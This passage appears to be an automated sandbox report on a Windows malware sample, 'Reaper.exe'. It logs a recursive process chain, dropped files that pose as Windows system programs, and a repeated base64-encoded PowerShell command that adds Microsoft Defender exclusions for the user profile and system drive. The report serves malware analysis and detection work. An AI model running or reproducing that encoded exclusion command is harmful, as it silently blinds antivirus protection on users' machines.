Reaper.exeWindows SmartScreen.exeWindows SmartScreen.exeReaper.exeWindows SmartScreen.exeWindows SmartScreen.exerar.exepid process 3960 Reaper.exe 3680 Windows SmartScreen.exe 8096 Windows SmartScreen.exe 7224 Reaper.exe 5580 Windows SmartScreen.exe 3972 Windows SmartScreen.exe 776 rar.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Reaper.exeReaper.exeWindows SmartScreen.exeWindows SmartScreen.exeReaper.exeWindows SmartScreen.exeReaper.exeWindows SmartScreen.exeWindows SmartScreen.exedescription pid process target process PID 3592 wrote to memory of 572 3592 Reaper.exe powershell.exe PID 3592 wrote to memory of 572 3592 Reaper.exe powershell.exe PID 3592 wrote to memory of 572 3592 Reaper.exe powershell.exe PID 3592 wrote to memory of 4104 3592 Reaper.exe Reaper.exe PID 3592 wrote to memory of 4104 3592 Reaper.exe Reaper.exe PID 3592 wrote to memory of 4104 3592 Reaper.exe Reaper.exe PID 3592 wrote to memory of 3680 3592 Reaper.exe Windows Driver Foundation.exe PID 3592 wrote to memory of 3680 3592 Reaper.exe Windows Driver Foundation.exe PID 3592 wrote to memory of 4968 3592 Reaper.exe Windows Service Wrapper.exe PID 3592 wrote to memory of 4968 3592 Reaper.exe Windows Service Wrapper.exe PID 4104 wrote to memory of 1184 4104 Reaper.exe powershell.exe PID 4104 wrote to memory of 1184 4104 Reaper.exe powershell.exe PID 4104 wrote to memory of 1184 4104 Reaper.exe powershell.exe PID 4104 wrote to memory of 3316 4104 Reaper.exe Reaper.exe PID 4104 wrote to memory of 3316 4104 Reaper.exe Reaper.exe PID 4104 wrote to memory of 3316 4104 Reaper.exe Reaper.exe PID 4104 wrote to memory of 2032 4104 Reaper.exe rundll32.exe PID 4104 wrote to memory of 2032 4104 Reaper.exe rundll32.exe PID 3592 wrote to memory of 4908 3592 Reaper.exe Windows SmartScreen.exe PID 3592 wrote to memory of 4908 3592 Reaper.exe Windows SmartScreen.exe PID 4104 wrote to memory of 4880 4104 Reaper.exe DllHost.exe PID 4104 wrote to memory of 4880 4104 Reaper.exe DllHost.exe PID 4104 wrote to memory of 4528 4104 Reaper.exe cmd.exe PID 4104 wrote to memory of 4528 4104 Reaper.exe cmd.exe PID 4908 wrote to memory of 4748 4908 Windows SmartScreen.exe Windows SmartScreen.exe PID 4908 wrote to memory of 4748 4908 Windows SmartScreen.exe Windows SmartScreen.exe PID 4528 wrote to memory of 388 4528 Windows SmartScreen.exe Windows SmartScreen.exe PID 4528 wrote to memory of 388 4528 Windows SmartScreen.exe Windows SmartScreen.exe PID 3316 wrote to memory of 1936 3316 Reaper.exe powershell.exe PID 3316 wrote to memory of 1936 3316 Reaper.exe powershell.exe PID 3316 wrote to memory of 1936 3316 Reaper.exe powershell.exe PID 3316 wrote to memory of 4016 3316 Reaper.exe Reaper.exe PID 3316 wrote to memory of 4016 3316 Reaper.exe Reaper.exe PID 3316 wrote to memory of 4016 3316 Reaper.exe Reaper.exe PID 3316 wrote to memory of 4744 3316 Reaper.exe Windows Driver Foundation.exe PID 3316 wrote to memory of 4744 3316 Reaper.exe Windows Driver Foundation.exe PID 3316 wrote to memory of 2272 3316 Reaper.exe Windows Service Wrapper.exe PID 3316 wrote to memory of 2272 3316 Reaper.exe Windows Service Wrapper.exe PID 3316 wrote to memory of 1460 3316 Reaper.exe Windows SmartScreen.exe PID 3316 wrote to memory of 1460 3316 Reaper.exe Windows SmartScreen.exe PID 1460 wrote to memory of 4204 1460 Windows SmartScreen.exe Windows SmartScreen.exe PID 1460 wrote to memory of 4204 1460 Windows SmartScreen.exe Windows SmartScreen.exe PID 4016 wrote to memory of 4304 4016 Reaper.exe powershell.exe PID 4016 wrote to memory of 4304 4016 Reaper.exe powershell.exe PID 4016 wrote to memory of 4304 4016 Reaper.exe powershell.exe PID 4016 wrote to memory of 4208 4016 Reaper.exe Reaper.exe PID 4016 wrote to memory of 4208 4016 Reaper.exe Reaper.exe PID 4016 wrote to memory of 4208 4016 Reaper.exe Reaper.exe PID 4016 wrote to memory of 1084 4016 Reaper.exe Windows Driver Foundation.exe PID 4016 wrote to memory of 1084 4016 Reaper.exe Windows Driver Foundation.exe PID 4016 wrote to memory of 112 4016 Reaper.exe cmd.exe PID 4016 wrote to memory of 112 4016 Reaper.exe cmd.exe PID 4016 wrote to memory of 4788 4016 Reaper.exe Windows SmartScreen.exe PID 4016 wrote to memory of 4788 4016 Reaper.exe Windows SmartScreen.exe PID 4748 wrote to memory of 2124 4748 Windows SmartScreen.exe cmd.exe PID 4748 wrote to memory of 2124 4748 Windows SmartScreen.exe cmd.exe PID 4748 wrote to memory of 4396 4748 Windows SmartScreen.exe cmd.exe PID 4748 wrote to memory of 4396 4748 Windows SmartScreen.exe cmd.exe PID 4748 wrote to memory of 4384 4748 Windows SmartScreen.exe cmd.exe PID 4748 wrote to memory of 4384 4748 Windows SmartScreen.exe cmd.exe PID 4788 wrote to memory of 5052 4788 Windows SmartScreen.exe Windows SmartScreen.exe PID 4788 wrote to memory of 5052 4788 Windows SmartScreen.exe Windows SmartScreen.exe PID 4748 wrote to memory of 4916 4748 Windows SmartScreen.exe cmd.exe PID 4748 wrote to memory of 4916 4748 Windows SmartScreen.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 5280 attrib.exe 7492 attrib.exe 6100 attrib.exe 7724 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"5⤵
- Checks computer location settings
PID:4208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3368 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"6⤵
- Checks computer location settings
PID:3152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5556 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"7⤵
- Checks computer location settings
PID:5908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"8⤵
- Checks computer location settings
PID:4144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6808 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"9⤵
- Checks computer location settings
PID:6148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7092 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"10⤵
- Checks computer location settings
PID:5912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"11⤵
- Checks computer location settings
PID:4336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7108 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"12⤵
- Checks computer location settings
PID:7308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7968 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"13⤵
- Checks computer location settings
PID:8048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7988 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"14⤵
- Checks computer location settings
PID:8060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7212 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"15⤵
- Checks computer location settings
PID:7368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="16⤵
- Command and Scripting Interpreter: PowerShell
PID:4680 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"16⤵
- Checks computer location settings
PID:1852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="17⤵
- Command and Scripting Interpreter: PowerShell
PID:5656 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"17⤵
- Checks computer location settings
PID:8136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="18⤵
- Command and Scripting Interpreter: PowerShell
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"18⤵
- Checks computer location settings
PID:7912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="19⤵
- Command and Scripting Interpreter: PowerShell
PID:6820 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"19⤵
- Checks computer location settings
PID:6228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="20⤵
- Command and Scripting Interpreter: PowerShell
PID:6104 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"20⤵PID:6376
-
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"20⤵PID:6640
-
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"20⤵PID:7316
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"20⤵PID:7580
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"21⤵PID:1808
-
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"19⤵PID:5224
-
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"19⤵PID:212
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"19⤵PID:468
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"20⤵PID:6928
-
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"18⤵PID:3032
-
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"18⤵PID:4108
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"18⤵PID:6876
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"19⤵PID:8032
-
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"17⤵
- Executes dropped EXE
PID:6160 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"17⤵
- Executes dropped EXE
PID:6504 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"17⤵
- Executes dropped EXE
PID:5572 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"18⤵
- Executes dropped EXE
PID:3560 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"16⤵
- Executes dropped EXE
PID:8132 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"16⤵
- Executes dropped EXE
PID:7144 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"16⤵
- Executes dropped EXE
PID:4724 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"17⤵
- Executes dropped EXE
PID:7184 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"15⤵
- Executes dropped EXE
PID:4956 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"15⤵
- Executes dropped EXE
PID:6876 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"15⤵
- Executes dropped EXE
PID:6444 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"16⤵
- Executes dropped EXE
PID:8020 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"14⤵
- Executes dropped EXE
PID:8076 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"14⤵
- Executes dropped EXE
PID:4368 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"14⤵
- Executes dropped EXE
PID:3064 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"15⤵
- Executes dropped EXE
PID:5236 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"13⤵
- Executes dropped EXE
PID:8108 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"13⤵
- Executes dropped EXE
PID:5808 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"13⤵
- Executes dropped EXE
PID:4268 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"14⤵
- Executes dropped EXE
PID:2396 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"12⤵
- Executes dropped EXE
PID:7540 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"12⤵
- Executes dropped EXE
PID:7612 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"12⤵
- Executes dropped EXE
PID:7692 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"13⤵
- Executes dropped EXE
PID:8040 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"11⤵
- Executes dropped EXE
PID:924 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"11⤵
- Executes dropped EXE
PID:7148 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"11⤵
- Executes dropped EXE
PID:1796 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"12⤵
- Executes dropped EXE
PID:7180 -
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"10⤵
- Executes dropped EXE
PID:4656 -
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"10⤵
- Executes dropped EXE
PID:5936 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"10⤵
- Executes dropped EXE
PID:5472 -
